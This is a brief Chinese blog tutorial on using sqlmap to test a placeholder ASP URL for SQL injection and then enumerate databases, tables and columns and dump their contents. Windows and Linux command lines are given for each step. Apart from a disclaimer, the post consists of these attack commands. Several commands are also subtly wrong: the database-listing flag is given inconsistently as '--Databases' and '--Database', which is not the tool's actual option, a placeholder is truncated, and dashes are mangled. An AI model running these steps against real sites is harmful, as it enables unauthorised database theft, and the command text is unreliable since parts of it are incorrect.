SQLmap————2、Access注入

版权声明:严禁将博客中涉及到的技术用于恶意破坏,如果造成法律责任,博主概不负责! https://blog.csdn.net/Fly_hps/article/details/80198425

1、判断给定的URL是否能注入

Windows下:sqlmap.py  –u   http://www.xxx.com/sql/test.asp?id=1

Linux下:sqlmap  –u    http://www.xxx.com/sql/test.asp?id=1

2、猜解数据库名称

Windows下:sqlmap.py  –u   http://www.xxx.com/sql/test.asp?id=1 --Databases

Linux下:sqlmap  –u    http://www.xxx.com/sql/test.asp?id=1  --Database

3、猜解表名

Windows下:sqlmap.py  –u   http://www.xxx.com/sql/test.asp?id=1  -D  数据  --tables

Linux下:sqlmap  –u    http://www.xxx.com/sql/test.asp?id=1  -D 数据库名  --tables

4、根据猜解的表名猜解表的字段

Windows下:sqlmap.py  –u   http://www.xxx.com/sql/test.asp?id=1  -D  数据库名 -T  表名  --columns

Linux下:sqlmap  –u    http://www.xxx.com/sql/test.asp?id=1  -D 数据库名  -T 表名  --columns

5、根据字段猜解内容

Windows下:sqlmap.py  –u   http://www.xxx.com/sql/test.asp?id=1  -D  数据库名 -T 表名  -C  字段名 --dump

Linux下:sqlmap  –u    http://www.xxx.com/sql/test.asp?id=1  -D 数据库名  -T  表名  -C   字段名  –dump

没有更多推荐了,返回首页